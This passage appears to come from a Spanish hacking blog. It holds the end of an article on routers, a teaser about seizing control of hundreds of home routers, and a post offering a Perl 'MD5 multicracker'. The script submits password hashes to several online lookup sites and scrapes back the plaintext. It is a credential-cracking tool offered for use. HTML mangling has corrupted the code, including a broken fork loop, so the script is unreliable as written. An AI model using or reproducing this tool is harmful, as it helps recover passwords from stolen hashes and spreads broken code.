mantener a sus clientes a su propia red fuera de peligro.


Espero que el ejemplo quede claro. Como dije antes, con el tiempo, los routers
serán cada vez más complejos y esto no ha hecho más que empezar. El futuro del
hacking, a mi modo de ver, irá por este camino. Esperemos que le encuentren
solución rápidamente.

Fuente original:
http://www.descifra.me

Routers, el gran agujero de seguridad doméstica

En este artículo voy a hacer una descripción de cómo llegué a tomar el control absoluto de varios cientos de pequeños equipos conectados a l...

Leer más »

Crackeador MD5 5 en 1 Multiscanner

<div style="text-align: center;"><a class="posted" href="http://downloads.activestate.com/ActivePerl/Windows/5.8/ActivePerl-5.8.8.820-MSWin32-x86-274739.msi" target="_blank">Descargar: underline;"></a> <br /> <br /><div style="text-align: left;"><span style="text-decoration: underline;"><b>instalar esto primero para ejecutar el codigo</b></span> <br /> <br />bueno para crackear hash pero busca en las 5 paginas reconcidad como estas <br /><a class="posted" href="http://www.hashfind.info%3cbr%20/%3Ehttp://md5decrypter.com%3Cbr%20/%3Ehttp://SPAM%28103%29%3Cbr%20/%3Ehttp://md5.hashcracking.com%3Cbr%20/%3Ehttp://milw0rm.com%3Cbr%20/%3Ehttp://md5search.org" target="_blank">http://www.hashfind.info <br />http://md5decrypter.com <br />http://SPAM(103) <br />http://md5.hashcracking.com <br />http://milw0rm.com <br />http://md5search.org</a> <br /> <br /> <textarea name="textarea" rows="31" cols="47">use LWP::UserAgent;<br />use HTTP::Request::Common;<br />use HTTP::Cookies;<br /> <br /># By OzX<br />### BASE DE LAS PETICIONES ##############################################################################################<br />$browser = LWP::UserAgent->new();<br />$browser->timeout(10);<br />$browser->default_header(<br /> <br />"User-Agent" => "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1",<br />"Accept" => "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",<br />"Accept-Language" => "es-es,es;q=0.8,en-us;q=0.5,en;q=0.3",<br />"Referer" => "http://www.google.com"<br />);<br /> <br />#################################################################FUNCION GET Y POST<br />sub GETS{@code = split("\n",$content = $browser->request(GET $_[0])->content);return @code;}<br />sub POSTS{@code = split("\n",$content = $browser->request(POST $_[0], [%{$_[1]}])->content);return @code};<br />###############################################################################<br />$hash = $ARGV[0];<br />unless ($ARGV[0]) {<br /> print "MULTICRACKER 0.1 BY OZX \nCrackNB.pl <hash>\n";<br /> print "CrackNB.pl 202cb962ac59075b964b07152d234b70\n\n";<br /> exit 0;<br />}<br />########################################################<br />%webs = ('0' => "http://md5decrypter.com",<br /> '1' => "http://SPAM(103)",<br /> '2' => "http://md5.hashcracking.com",<br /> '3' => "http://milw0rm.com",<br /> '4' => "http://md5search.org",);<br /> <br />###PETICIONES ####################################<br />if ($hash =~/\w{32}/){<br />hashfind($hash);<br />for($i=0;$i<5;$i++){ pid =" fork();" pid ="=""> ".md5($i)."\n";<br /> exit 0;<br /> }<br /> }<br />}else{<br />print "<br /><br /> * HASH INVALIDO\n";<br /><br />exit;<br />}<br />#################################################<br />sub hashfind{<br />$hash = $_[0];<br />### COOKIE PARA http://www.hashfind.info <= ¬¬ $browser->cookie_jar(HTTP::Cookies->new(file => "cookie_hash.txt", autosave => 1));<br />@code = POSTS("http://www.hashfind.info/",{hash => $hash, button => Search});<br />@codex = GETS("http://www.hashfind.info/get.php?type=0 ");<br />print "http://www.hashfind.info :> @codex\n";<br />}<br /> <br />sub md5{<br />$id=$_[0];<br />$cracker[0]= crack_post($webs{$id},{hash => $hash, submit => Decrypt%21 },$hash,'.*Normal.*<\/b>','.*this hash wasn.*') ;<br />$cracker[1]= crack_get($webs{$id}."/qkhash.php?mode=txt&hash=",$hash,'.*><b>','<\/b><.*','.*\?',"<\/td><\/tr>");<br />$cracker[2]= crack_get($webs{$id}."/search.php?md5=",$hash,".*is ");<br />$cracker[3]= crack_post($webs{$id}."/cracker/search.php",{hash => $hash, Submit => Submit },$hash,"<\/TD><td align="\" nowrap="\" width="90">cracked.*",".*<tr class="\">.*nowrap=\"nowrap\" width=90>");<br />$cracker[4]= crack_post($webs{$id}."/index.php",{hash => $hash , server => all ,token => md5s , tryb => search, submit =>MD5Search%28%29},"<font.*size=\"-1\">.*nbsp",".*class=\"wyniksz\">","<\/font><\/td><\/tr><\/table><\/td><\/tr><\/table>.*p>","<\/font><\/td><\/tr>");<br /> <br />return $cracker[$id];<br />}<br /> <br />sub crack_post{<br />($url,$data,$match,@reg1) = @_;<br />@code = POSTS($url,$data);<br /> for $linea (@code){<br /> if ($linea=~/$match/i){<br /> for $reg (@reg1){<br /> $linea=~s/$reg//;<br /> }<br /> <br />return $linea;<br /> }<br /> <br /> }<br /> }<br /> <br />sub crack_get{<br />($url,$hash,@reg1) = @_;<br />@code = GETS($url.$hash);<br />for $linea (@code){<br /> if ($linea=~/$hash/i){<br /> for $reg (@reg1){<br /> $linea=~s/$reg//;<br /> <br /> }<br /> return $linea;<br /> }<br /> }<br /> }